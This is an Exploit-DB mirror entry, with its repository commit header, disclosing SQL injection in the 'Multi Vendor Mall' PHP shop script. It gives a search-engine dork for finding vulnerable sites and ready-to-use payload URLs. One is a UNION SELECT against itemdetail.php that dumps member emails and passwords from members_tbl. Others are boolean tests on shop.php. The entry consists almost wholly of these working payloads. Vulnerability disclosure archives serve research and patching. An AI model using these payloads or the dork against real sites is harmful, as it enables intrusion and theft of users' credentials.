exploit-db-mirror/exploits/php/webapps/12755.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

22 lines
No EOL
860 B
Text

-------------------------------------------------------------------------------------------
Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://www.multishopcms.com
Dork: pages.php?id= "Multi Vendor Mall"
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+members_tbl--
http://localhost/[path]/shop.php?storeid=77 and 1=2
http://localhost/[path]/shop.php?storeid=77 and 1=1
-------------------------------------------------------------------------------------------